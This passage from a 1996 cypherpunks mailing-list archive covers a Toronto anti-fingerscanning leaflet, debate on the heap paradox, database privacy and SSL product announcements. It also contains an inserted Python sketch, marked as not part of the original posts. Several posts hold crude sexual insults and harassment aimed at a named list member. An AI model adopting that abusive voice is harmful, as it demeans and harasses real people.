-the Royal Bank says that they will provide one training session in which people will be shown how to use bank machines. However, unless this session 1) trains people not to have mental illness 2) dismantles the cultural barriers to using bank machines and 3) teaches people to read and write English or French, many of the 31 200 people and their families who don't currently have bank accounts will not have access to their assistance funds.

PART 5: ISSUES OF CORPORATE AND GOVERNMENT CONTROL
How could the project bring more corporate control to the welfare system?
-The idea of bringing in corporate sponsorship is brought up again and again in Metro Committee documents...
pg.3, recommendation #2 that "the Corporate Administration Committee approve the continued participation of Metro Corporate and Human Resources in the systems and financial development of C.I.B.S. and the further exploration of the feasibility of C.I.B.S. applications to other corporate initiatives" the future of the welfare system???
pg.15, (B) (II) "the delivery foundation established by CIBS will give the Division unprecedented flexibility in the administration of program benefits. One advantage could be to use this flexibility to optimize customer purchasing power by obtaining credits for our customers from various suppliers - supermarket chains, drug chains, educational institutions, dental clinics, property management companies, clothing stores."
-This statement very strongly urges corporate sponsorship. Right now program benefits like dental care only cover certain services (eg fillings), and are only available to certain cash amounts. The insinuation is that any corporate benefit credits from grocery stores, clothing stores, etc. would be handled in the same way. ie. you would only be able to spend a certain amount on food, clothing, education etc. You would only be able to buy certain items, you would only be able to live in certain places. It makes it possible for the government to do things like make it impossible for you to buy cigarettes and junk food with your food credit. It makes it possible for governments of the future to control whether or not you are allowed to buy birth control and what types of birth control you are allowed to buy. Whatever companies sponsored the program would be the only ones that you could buy from, even if their prices are higher than other stores, even if they aren't located near your home, even if you have cultural/personal/political reasons for not wanting to shop at these large corporations. It means that poor people would no longer be entitled to basic freedoms of choice. And like with dental benefits now, the location, time and details of your purchases would be recorded. The kind of underwear you buy, what you buy at the grocery store, what type of drugs you purchase, would all be recorded by the government. It opens the door for a frightening amount of government and corporate control and surveillance.

PART 6: A SYSTEM DESIGNED FOR EXPANSION-- WELFARE RECIPIENTS AS GUINEA PIGS.
Could fingerscanning of welfare recipients expand beyond Metro Toronto in the future?
-yes, Metro council recommended that they consider making it nationwide in the future.
"By working with its private sector partners to build an integrated customer identification and disbursement system that meets the operational and business needs of a large income support program, Metro will gain valuable experience and expertise that can be applied to other jurisdictions." (pg.7 (II) )
-they are also talking about selling this program to other areas, pg.7, (II) "There is also the potential for future revenues related to the sale of specific applications developed for Metro to other jurisdictions. There is clear interest in the approach the Division is taking, and the results that will be achieved."

Could fingerscanning be used for other government programs?
-Metro Human Services Committee report (#8) explains that, "recently, the Provincial government has announced it is assessing the development of an identification card that could cover a range of programs.... C.I.B.S. employs technologies that will very likely be compatible, and can be incorporated, with prospective provincial applications." (p.7, comments and discussion Part I (c)). The report goes on to clearly explain that one of the reasons for developing biometric id for welfare recipients is because they want to be prepared for when the province starts using fingerscanning for other areas.
-Mytec, one of the companies competing to supply the biometric technology also hopes to apply it to (among other things) Canadian immigration and healthcare.
-The spread of biometric identification has worked similarly in the US...Its use on welfare recipients has gradually become more and more widespread. The acceptance of its use for this purpose has made it possible for the country to move in the direction of using biometric id for a wide variety of services.
In February, Congress discussed a bill that called for fingerscanning every resident of the US over the age of 16 in order to develop a centralized database of information that would have been made available to a wide variety of government and corporate interests, including anyone who claims to be a potential employer. Now that fingerscanning for government services has become entrenched in the United States it is extremely difficult for people to fight against its use. People on welfare in Toronto can be seen as the test case for widespread use of fingerscanning in Canada, the beginning of a slippery slope.

PART 7: FIGHTING BACK
Legal Battles
-Several groups in Toronto are confronting this issue as a human rights violation. Their strategy is to use the courts in order to have fingerscanning struck down.

What can people on welfare do to fight against this?
-Gather and publicize information about this issue (eg. through leafletting, press releases, demonstrations, stickering, civil disobedience, street theatre...)
-Join the Toronto coalition being formed by the Toronto-based group "Low Income Families Together"
-Speak to one of the legal groups interested in pursuing fingerscanning as a human rights issue (contact Elinor Mahoney at Parkdale Legal Services, for instance)
-Refuse to be fingerscanned. (So far you are legally entitled to do this, however there are risks involved that you may or may not be able to take). Some of these risks are.... Getting your cheque later than otherwise, (which could make it difficult to pay bills on time), being treated as suspicious by social service workers, being harassed

What can anyone do if they're concerned about fingerscanning?
-Make funds and support available for people on welfare who choose not to be scanned
-Join the Toronto Coalition against fingerscanning being formed by Low Income Families Together
-Join the province-wide campaign against fingerscanning by talking with any of the contacts listed below
-Gather and publicize info about this issue (eg through leafletting, demonstrations, press releases, stickering, civil disobedience, street theatre...)
*the campaign against fingerscanning can provide you with leaflets, posters, info, contacts in your area...
-voice your concerns LOUDLY to Metro Council
-Donate resources.... photocopying, faxing, use of phones, artistic talent, your TIME, your skills (eg. with dealing with media, with strategizing, with caring for children so people who often don't get a chance to participate in political activities can get involved..), your computer, your legal advice/representation....
-Boycott the Royal Bank to put pressure on them to withdraw from the consortium (this is the thrust of the Campaign against Fingerscanning's strategy...people have already withdrawn their student loans, accounts, and RRSPs from the Bank)

Who can I get more information from?
Contact....
Guelph: Orenda Davis (519)763-5292, or Sarah Vance (519)763-6726
Toronto: Kirsten at Low Income Families Together (416)597-9400 or fax: (416)597-2128 or email or

From andrew_loewenstern at il.us.swissbank.com Fri Sep 20 16:41:31 1996
From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern)
Date: Sat, 21 Sep 1996 07:41:31 +0800
Subject: Paradox: NO OPPRESSION IN AMERICA
In-Reply-To:
Message-ID: <9609202023.AA01121@ch1d157nwk>

Douglas Renner writes:
> Those of you who took Logic 1001 will recall the paradox known
> as "The Heap" which goes like this:

Hey, a liberty here, some freedom there, and pretty soon you're talking about real totalitarianism!

andrew

"It could never happen here."
From hevnsnt at ksu.edu Fri Sep 20 17:14:42 1996 From: hevnsnt at ksu.edu (Y Do U Care) Date: Sat, 21 Sep 1996 08:14:42 +0800 Subject: unscribe cypherpunks@toad.com In-Reply-To: <199609191939.PAA21770@jekyll.piermont.com> Message-ID: On Thu, 19 Sep 1996, Perry E. Metzger wrote: > > Steve Dyson writes: > > unscribe cypherpunks at toad.com > > Never. > unscribe cypherpunks at toad.com From jeremey at veriweb.com Fri Sep 20 17:18:57 1996 From: jeremey at veriweb.com (Jeremey Barrett) Date: Sat, 21 Sep 1996 08:18:57 +0800 Subject: Paradox: NO OPPRESSION IN AMERICA In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Well I'm just grumpy enough right now to tear this apart... :) On Fri, 20 Sep 1996, Douglas B. Renner wrote: > Those of you who took Logic 1001 will recall the paradox known as > "The Heap" which goes like this: > > 1. A single grain of sand does not constitute a heap of sand. An debatable but valid assumption. > 2. You can create a heap from a non-heap by adding a single grain of sand. How is a non-heap defined? 1 grain? 0 grains? If (2) is to be true, it can't be 0, since you assumed (1), so a non-heap must be 1 grain. > 3. Therefore, there is *NO SUCH THING* as a heap of sand. Huh? How do you draw that conclusion? (1) and (2) are not contradictory in any way. You said 1 grain is not a heap, but >1 is. Fine. Valid way of defining a heap/non-heap of sand. Nothing to do with (3). > > You with me here? Okay, this is important, because the public actually does > think like this: Very debatable. Very general. > > 1. Our current society in America is not oppressive. (generally accepted) Very debatable. > > 2. You cannot change a non-oppressive society into an oppressive society > by removing one liberty from its citizens. (also generally accepted) Rubbish. If the government removes all liberties at once, that's oppressive, but if they do it one at a time, it's not? > > 3. Therefore, it is not possible for America to become an oppressive society. 
> More Rubbish. Not only are your assumptions flawed, but the heap argument and the oppression argument are entirely unrelated. Nothing personal, mind you. :) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Jeremey Barrett Senior Software Engineer jeremey at veriweb.com VeriWeb Internet Corp. http://www.veriweb.com/ PGP Key fingerprint = 3B 42 1E D4 4B 17 0D 80 DC 59 6F 59 04 C3 83 64 PGP Public Key: http://www.veriweb.com/people/jeremey/pgpkey.html "less is more." -- Mies van de Rohe. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMkMLVC/fy+vkqMxNAQFHsgQAmK/nDEVv17ntZ2k172/S5ps4nYJeCFjM 4Ek8eOTG54pju5CYAZBTAYIOZNX4iDp4vK3Qyj3d1PAqpLCqQPJo3/Zr/dz21RH8 RkIP4IvEyFGNzpedh1yFe8wj8zGOPXk9OdblNujx8fFmThuk02zUJyUG+GDxBdDa zQGuNpTT7H8= =MFgt -----END PGP SIGNATURE----- From markm at voicenet.com Fri Sep 20 17:22:04 1996 From: markm at voicenet.com (Mark M.) Date: Sat, 21 Sep 1996 08:22:04 +0800 Subject: ANYONES CREDIT CARD # per your request. In-Reply-To: <9609201825.AA18161@super.mhv.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 20 Sep 1996, Lynne L. Harrison wrote: > You can go to their web page (http://www.lexis-nexis.com), click "Just > In" and request via email that your name be removed from their database by > filling out the form. > Problem, of course, is that one doesn't know if one's name and info is in > the database unless one is a subscriber and can look it up. I, personally, > do not feel comfortable in filling out a form with my personal info and > sending it along - 1) for the obvious reasons; and 2) what if I'm not even > in their nefarious database? If not, then I've just entered my personal > info and sent it on its merry way to whomever and wherever unnecessarily - > whether by email, fax, or snail mail. 
There is an easy technical solution to this: store a one-way hash of each entry in a database field, so if one wants to be removed, all one has to do is send the one-way hash of their personal information. If there is a database entry that matches the hash, then it is up to the database maintainer to remove the entry. If there isn't a matching entry, then no personal information will have been given out. I wonder how many "privacy conscious" database maintainers will actually implement a scheme like this.

> I tried just entering my name, email address, and state but, as
> anticipated, received a msg that ALL info has to be supplied, so I'll chk
> with someone I know that has an account to see if my name is there.
> However, the BIGGEST problem I foresee with this database (and others
> like it) is that someone eventually is going to hack it - and then watch the
> fun and games ensue.

TRW credit databases have been broken into many times, and they have more information than Lexis-Nexis (credit-card numbers minus the last four digits, addresses, telephone numbers, and of course, credit histories). Nothing really devastating has happened because of these incidents.

Mark
- --
PGP encrypted mail preferred.
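[The removal scheme described in the message above, as an added sketch. It is not part of the original post and not code from any database vendor. The field list, the canonicalization rules, the choice of SHA-256 and all sample records are assumptions constructed for the example.]

```python
import hashlib
import unicodedata

# Hypothetical schema: the fields both sides agree to hash, in this order.
FIELDS = ("name", "street", "city", "state", "postal_code")


def canonicalize(record):
    """Encode a record so that equivalent spellings give identical bytes."""
    parts = []
    for field in FIELDS:
        value = unicodedata.normalize("NFKC", record.get(field, ""))
        value = " ".join(value.casefold().split())  # ignore case and spacing
        encoded = value.encode("utf-8")
        # A length prefix keeps ("ab", "c") distinct from ("a", "bc").
        parts.append(len(encoded).to_bytes(4, "big") + encoded)
    return b"".join(parts)


def record_digest(record):
    """One-way hash of the canonical record (SHA-256 is an assumption)."""
    return hashlib.sha256(canonicalize(record)).hexdigest()


def is_well_formed(digest):
    """A removal request must be exactly one hex-encoded SHA-256 value."""
    return (isinstance(digest, str) and len(digest) == 64
            and all(c in "0123456789abcdef" for c in digest.lower()))


class Directory:
    """Maintainer side: every entry is indexed by the digest of its fields."""

    def __init__(self):
        self._entries = {}

    def add(self, record):
        digest = record_digest(record)
        self._entries[digest] = dict(record)
        return digest

    def handle_removal_request(self, digest):
        """Accept only a digest; return True if a matching entry was removed."""
        if not is_well_formed(digest):
            raise ValueError("removal request must be a 64-character hex digest")
        return self._entries.pop(digest.lower(), None) is not None

    def __len__(self):
        return len(self._entries)


def demo():
    """Run one listed and one unlisted removal request on constructed data."""
    directory = Directory()
    directory.add({"name": "Alice Example", "street": "1 Test Lane",
                   "city": "Springfield", "state": "NY", "postal_code": "00000"})
    directory.add({"name": "Bob Sample", "street": "2 Demo Road",
                   "city": "Shelbyville", "state": "NY", "postal_code": "00001"})

    # Requester side: the digest is computed locally and only it is sent.
    # Alice types her details with different case and spacing than the entry.
    alice = record_digest({"name": "  alice   EXAMPLE", "street": "1 test lane",
                           "city": "springfield", "state": "ny",
                           "postal_code": "00000"})
    # Carol is not in the directory; her request carries a digest and no fields.
    carol = record_digest({"name": "Carol Nobody", "street": "3 Nowhere St",
                           "city": "Springfield", "state": "NY",
                           "postal_code": "00002"})

    removed_listed = directory.handle_removal_request(alice)
    removed_unlisted = directory.handle_removal_request(carol)
    return removed_listed, removed_unlisted, len(directory)


if __name__ == "__main__":
    print(demo())
```

[Both sides have to apply the same canonicalization, or a genuine entry will not match. A digest of fields that can be guessed (a name plus a state, say) can be confirmed by anyone who holds the candidate values, so the digest should cover fields the recipient could not enumerate.]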
Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMkMMxSzIPc7jvyFpAQFoiggAusskPBsG0cvMXYcCmJaJR6Rlbcny+48C byAs3Bg4E2aMHusyll2+t7GPX897VtVGm1iBaAKZFkfFcyQcHoq+aw+hqJseG/As Yz3x6702e6y4qOfv+JpyCJk9c19ys4XSkHqsrJl3txFvakrBP4xfstWtDKk2P1EH 4aIDvEaStdabqhMQqayKqU09tLY6A++XZ5zbzK/ovVDQIgCW2cDsmtYTo8ZVktPq PqTnaHVY7B3oj+XEl7sfS1qKew4KEJiClmlztA7Lk7Kn6Zo6TnBPKOICFHjlnOyy +gitMH7yYuGVo95jcRzImyDMm6z2mjcHTVlmEnxK2k85PtR9El3ZuQ== =zaz8 -----END PGP SIGNATURE----- From jbugden at smtplink.alis.ca Fri Sep 20 17:30:39 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Sat, 21 Sep 1996 08:30:39 +0800 Subject: A daily warning regarding Tim C[ocksucker] Maya, the ... Message-ID: <9608208432.AA843266540@smtplink.alis.ca> Subject: RE: A daily warning regarding Tim C[ocksucker] Maya, the lying s nobody at cypherpunks.ca (John Anonymous MacDonald) wrote: >Tim C Maya studied yoga back-streching exercises for > five years so he could blow himself. Tim! Is the course still offered! Where do I sign up! James Q: Why does a dog lick itself? From dlv at bwalk.dm.com Fri Sep 20 18:37:14 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 09:37:14 +0800 Subject: Dimitri Spams In-Reply-To: Message-ID: Ray Arachelian writes: > Dimitri, get a life! We need Dimitri Spams as much as we needed > Perrygrams. Which is to say, we need them not at all! I see you lied when you claimed to have killfiled me. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jeremey at veriweb.com Fri Sep 20 18:39:58 1996 From: jeremey at veriweb.com (Jeremey Barrett) Date: Sat, 21 Sep 1996 09:39:58 +0800 Subject: Paradox: NO OPPRESSION IN AMERICA In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 20 Sep 1996, Douglas B. Renner wrote: > > > On Fri, 20 Sep 1996, Jeremey Barrett wrote: > > > > Rubbish. 
If the government removes all liberties at once, that's > > > If I went over your head, I apologize! > The point of a paradox such as this is to illustrate something which is > OBVIOUSLY FALLACIOUS, so that we might learn from it. The intention is > to make us *think*. I have seen many a post more foolish that was intended in all seriousness. My point is that neither your first nor second arguments are a paradox, nor do they relate to one another. I agree that many people may not see their freedoms being whittled away, simply because they are being whittled away, as opposed to eliminated all at once. If that is your point however, it was unclear. Apologies if you were upset by my response. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Jeremey Barrett Senior Software Engineer jeremey at veriweb.com VeriWeb Internet Corp. http://www.veriweb.com/ PGP Key fingerprint = 3B 42 1E D4 4B 17 0D 80 DC 59 6F 59 04 C3 83 64 PGP Public Key: http://www.veriweb.com/people/jeremey/pgpkey.html "less is more." -- Mies van de Rohe. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMkMoUy/fy+vkqMxNAQFQIQP/UNUTD+MtbSpYZhLNNGcUXqzgRcA//8EO 7SJknZWlm2vHtd5siVOd847H9g+hJ5K9CdrzxgQgCUz4LT8FwZ5peLmM+gDvONGx XIZl3CSMlSv90msR50h8f1glMUiRJa2Q7vbIcj46GEwZx3U67bJe+MSdMcHumK8U /RPKQ96qkdQ= =u4aS -----END PGP SIGNATURE----- From dougr at skypoint-gw.globelle.com Fri Sep 20 18:41:44 1996 From: dougr at skypoint-gw.globelle.com (Douglas B. Renner) Date: Sat, 21 Sep 1996 09:41:44 +0800 Subject: Paradox: NO OPPRESSION IN AMERICA In-Reply-To: Message-ID: On Fri, 20 Sep 1996, Jeremey Barrett wrote: > > Rubbish. If the government removes all liberties at once, that's If I went over your head, I apologize! The point of a paradox such as this is to illustrate something which is OBVIOUSLY FALLACIOUS, so that we might learn from it. The intention is to make us *think*. 
-Doug From sameer at c2.net Fri Sep 20 18:45:17 1996 From: sameer at c2.net (sameer) Date: Sat, 21 Sep 1996 09:45:17 +0800 Subject: C2NET AND UK WEB OFFER UNCRIPPLED SECURITY SOFTWARE TO WEB USERS IN ALL COUNTRIES Message-ID: <199609202332.QAA13460@lachesis.c2.net> For Release Sept. 20, 1996 C2Net: Sandy Sandfort +1 510-986-8770 UK Web: Dave Williams +44 0113 222 0046 C2NET AND UK WEB OFFER UNCRIPPLED SECURITY SOFTWARE TO WEB USERS IN ALL COUNTRIES LEEDS - Today, UK Web Ltd. and C2Net (Community ConneXion, Inc.) announced the worldwide availability of Stronghold security software for the World Wide Web. Stronghold is a commercial version of Apache, a powerful and popular server software package for the Internet. Stronghold uses "Secure Sockets Layer" (SSL), a cryptographically strong protocol to protect credit card numbers and other sensitive information from Internet eavesdroppers. Stronghold also comes with a full range of "certificate authority" tools, documentation, easy installation, and technical support. Export versions of other Web servers, such as the Netscape Enterprise and Microsoft Internet Information Server have intentionally crippled encryption security. Stronghold uses uncompromised strong encryption world-wide. This is possible because it was written using software developed outside the US. Stronghold uses the full power of 128-bit symmetric encryption for maximum security. (Competing servers exported from the US use only 40-bit, low-level security). Stronghold is fully compatible with all secure browsers, including Netscape Navigator and Microsoft and Internet Explorer. "Stronghold is based on the most powerful Web server and the most secure Internet encryption," says Mark Cox, Stronghold product manager. "Users of Stronghold can be sure that their commercial transactions are completely private and secure." 
Dave Williams, Managing Director of UK Web, adds "Stronghold has already proved very popular in the US and Canada, where it has been available nearly a year. UK Web will now be selling Stronghold exclusively outside the US and Canada, giving the rest of the world the first opportunity to buy this top-rated product. We think it will be very popular."

UK Web is a leading authority on the Apache web server. They are committed to information-sharing and openness. They also offer commercial support for Apache. UK Web publishes a weekly newsletter called "Apache Week" which is available free of charge on the Internet. The Apache Week Web site can be found at http://www.apacheweek.com/.

"In the past year the demand for an international version of Stronghold has been steadily increasing," said Sameer Parekh, President of C2Net, "but we've never been willing to give our customers a false sense of security by shipping a defective product. We're very glad UK Web can satisfy the need for an international version of Stronghold."

International Stronghold costs 329 pounds, which includes free minor upgrades. It is free for non-commercial use by educational and not-for-profit organisations. Full server source code is provided as well as the pre-compiled server. It is available for the most commonly used Unix platforms, including Linux, SunOS 4, Solaris 2, IRIX and AIX. The server is based on the popular Apache module API, which gives access to a wide range of third-party server add-on "modules", most available for free.

Within the United States and Canada Stronghold is available from C2Net. (See http://stronghold.c2.net/) Full details of International Stronghold are available on the UK Web's web site, at http://stronghold.ukweb.com/. The software is available for free download and evaluation.

UK Web Limited is a leading Internet services company specialising in server technology, Internet security, business solutions and effective site design.
C2Net (also known as Community ConneXion, Inc.) is the leading provider of uncompromising security on the Internet. C2Net provides a wide array of Internet privacy services and powerful network security software. Portions of Stronghold were developed by the Apache Group, and were taken with permission from the Apache Server http://www.apache.org/. This product includes software developed by Ben Laurie for use in the Apache-SSL HTTP server project. This product includes software developed by Eric Young (eay at mincom.oz.au). Netscape Navigator and Netscape Enterprise are trademarks of Netscape Communications Corporation. Microsoft Internet Explorer and Microsoft Internet Information Server are trademarks of Microsoft Corporation. Stronghold is a trademark of Community ConneXion, Inc. From sunder at brainlink.com Fri Sep 20 19:05:34 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Sat, 21 Sep 1996 10:05:34 +0800 Subject: A daily warning regarding Tim C[ocksucker] Maya, the lying sack , of shit In-Reply-To: <199609201738.KAA00561@abraham.cs.berkeley.edu> Message-ID: On Fri, 20 Sep 1996, John Anonymous MacDonald wrote: > Tim C[ocksucker] Maya studied yoga back-streching exercises for > five years so he could blow himself (nobody else will). Likely the NSA has nothing better to do these days. They got bored with just listening, so now they're spamming. Can we lock this fucker out of the list? Sure, he'll probably pick another nym to post from... ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! 
ActiveX! Format Hard drive? Just say yes!

From pgf at acadian.net Fri Sep 20 20:03:25 1996
From: pgf at acadian.net (Phil Fraering)
Date: Sat, 21 Sep 1996 11:03:25 +0800
Subject: How's the list?
Message-ID:

I thought I'd ask how the list is going... it seems to have gone downhill; there are now totally gratuitous insults to tcmay that don't seem to serve any purpose besides making sure the archive (if there is one) isn't fit for family viewing. Hey, at least when I was insensitive, I put effort into it. And I didn't use an automatic daemon.

Anyway, I thought I'd catch up on current events with the following questions:

* I take it SSL still hasn't been strengthened?

* I'm now working part of the time at a company that has a lot of mail-order sales; are any of you aware of how much credit card fraud is going on out there right now? Might some of this actually be from unsecure SSL transactions?

* Did anyone come up with any interesting embellishments (or maybe precedents?) to my bidirectional Dining Cryptographers idea? I can't believe I'm the first to come up with this... I guess it's public domain now, since I missed the one-year deadline for patenting it.

Well, I gotta run...

Phil Fraering "And the moral of the story is, pgf at acadian.net *never count your boobies until they 318/261-9649 are hatched*." - James Thurber, "The Unicorn in the Garden"

From rah at shipwright.com Fri Sep 20 20:05:16 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 21 Sep 1996 11:05:16 +0800
Subject: "This way to the egress"
Message-ID:

P.T. Barnum also said something about suckers, too...

Cheers,
Bob Hettinga

-----------------
First Data, First USA Paymentech, GE Capital Invest in First Virtual Holdings

Wednesday 96.09.18 - San Diego, CA USA - First Virtual Holdings, Inc., developer of Internet transaction systems, announced today that First Data Corp.
and First USA Paymentech, Inc., two of the nation's largest credit card processing companies, and GE Capital have invested a total of $12.5 million in First Virtual Holdings, Inc. "This strategic alliance reinforces our belief that electronic commerce is coming of age on the Internet," said Lee Stein, chairman and chief executive officer of First Virtual. "It creates a powerful new combination between First Virtual, with its proven on-line transaction system, and leading credit card acquiring and processing companies. This represents a tremendous vote of confidence in our system by three industry leaders." In addition, the companies are discussing joint marketing agreements based on the concept of giving more than 200 million card holders automatic buying power on the Internet using the secure VirtualPIN(TM) identifier from First Virtual. "We expect that this partnership will enable First Virtual to significantly broaden its global marketing," Stein said. "Our secure e-mail based system is proven, easy to use and doesn't require specialized technologies. The VirtualPIN(TM) serves as the only identifier an individual needs for conducting business in cyberspace. It enables sellers and buyers on the Internet to link securely to any currency, payment system or standard verification system. With First Data, First USA Paymentech and GE Capital as partners, we anticipate more rapid acceptance of the Internet as an important distribution channel for businesses of all sizes." Stein said First Virtual created its VirtualPIN and Internet payment system to be part of a more complex transactional e-mail system for future marketing, customer service, communications and transaction applications. "The VirtualPIN provides the single identifier that can tie together all parts of the marketing and distribution chain: initial information, outbound offer, purchase order, confirmation, credit verification, transaction settlement and fulfilment of the order," said Stein. 
"The VirtualPIN serves as a convenient and secure alias for an individual's identity, including e- mail address and personal, demographic, shipping and financial information. This gives new power and privacy to the individual and puts him or her at the center of the electronic marketing universe." Stein said Pamela Patsley, chief executive officer of First USA Paymentech, Inc., and John McKinley, chief technology officer of GE Capital, have been elected to the First Virtual board of directors. ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From dlv at bwalk.dm.com Fri Sep 20 20:20:52 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 11:20:52 +0800 Subject: A daily warning regarding Tim C[ocksucker] Maya, the ... In-Reply-To: <9608208432.AA843266540@smtplink.alis.ca> Message-ID: jbugden at smtplink.alis.ca writes: > Subject: RE: A daily warning regarding Tim C[ocksucker] Maya, the lying s > > > nobody at cypherpunks.ca (John Anonymous MacDonald) wrote: > >Tim C Maya studied yoga back-streching exercises for=20 > > five years so he could blow himself. > > Tim! Is the course still offered! Where do I sign up!=20 > > James > > Q: Why does a dog lick itself? A: Because he can. One day Timmy and Jimmy were hanging out and they saw a dog licking his balls. "I wish I could do that," said Jimmy. "You better pet him first," said Timmy. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Fri Sep 20 20:26:39 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 11:26:39 +0800 Subject: A daily warning regarding Timothy C. 
May In-Reply-To: <843149202.18174.0@fatmans.demon.co.uk> Message-ID: >From paul at fatmans.demon.co.uk Thu Sep 19 23:39:14 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 01:23:58 EDT for paul at fatmans.demon.co.uk Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA02597 for dvl at bwalk.dm.com; Thu, 19 Sep 96 23:39:14 -0400 Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ah16490; 19 Sep 96 17:22 BST Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net id aa18174; 19 Sep 96 17:06 BST Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP id AA843059897 ; Wed, 18 Sep 96 15:18:17 +0000 Comments: Authenticated sender is From: paul at fatmans.demon.co.uk To: dvl at bwalk.dm.com Date: Wed, 18 Sep 1996 15:18:16 +0000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: A daily warning regarding Timothy C. May Priority: normal X-Mailer: Pegasus Mail for Windows (v2.31) Message-Id: <843149202.18174.0 at fatmans.demon.co.uk> > Timothy C. May is a lying sack of shit. Look, that is enough, I`m going to move to have you removed from the list if you keep this up... get a life fuckhead, if you are going to flame at least do it from your real address so people can killfile you, or maybe you believe censorship is better? 
Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From dlv at bwalk.dm.com Fri Sep 20 20:29:48 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 11:29:48 +0800 Subject: CIA hacked In-Reply-To: Message-ID: <1oykuD14w165w@bwalk.dm.com> DMiskell at envirolink.org (Daniel Christopher Miskell) writes: > > > >Who created you? You tub of shit? > > > Dude, why do you even bother? It is simply not constructive to keep insulting > and stabbing at people. You gripe about the non-crypto-relevent stuff, then > you go and create it repeatedly. If you don't like what people have to say, > take your potty mouth to another list. You are confused. The above question was e-mailed to me by one of Timmy May's friends. I just forward their e-mail to this mailing list. I don't read it.
If you have any comments about Timmy May's friends not knowing English, trying to insult people, and posting non-crypto-relevant political rants, address them to Timmy May and his friends. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Fri Sep 20 20:30:43 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 11:30:43 +0800 Subject: CIA hacked In-Reply-To: <9609201321.AA04474@elgreco.netapp.com> Message-ID: <0NykuD13w165w@bwalk.dm.com> >From koontz at netapp.com Fri Sep 20 09:16:24 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 11:08:54 EDT for dlv Received: from weaver-gw.netapp.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA10139 for dlv at bwalk.dm.com; Fri, 20 Sep 96 09:16:24 -0400 Received: from netapp.com ([192.9.200.1]) by weaver.netapp.com with SMTP id <15867-119>; Fri, 20 Sep 1996 06:17:39 +0100 Received: from elgreco.netapp.com by netapp.com (4.1/SMI-4.1) id AA19140; Fri, 20 Sep 96 06:16:19 PDT Received: by elgreco.netapp.com (4.1/SMI-4.1) id AA04474; Fri, 20 Sep 96 06:21:50 PDT Date: Fri, 20 Sep 96 06:21:50 PDT From: koontz at netapp.com (Dave Koontz) Message-Id: <9609201321.AA04474 at elgreco.netapp.com> To: dlv at bwalk.dm.com Subject: Re: CIA hacked >Who created you? You tub of shit? Actually, english being my native language, and having paid attention in school, that should be: Who created you, you tub of shit? From markm at voicenet.com Fri Sep 20 20:53:23 1996 From: markm at voicenet.com (Mark M.) Date: Sat, 21 Sep 1996 11:53:23 +0800 Subject: OTP seed solution? - strong, tried before??? In-Reply-To: <842976406.25087.0@fatmans.demon.co.uk> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 17 Sep 1996 paul at fatmans.demon.co.uk wrote: > A very simple idea came to me today that I`m sure has been done > before and I wanted to find out if it has any problems I haven`t > seen: > > A strong random generator (ie. 
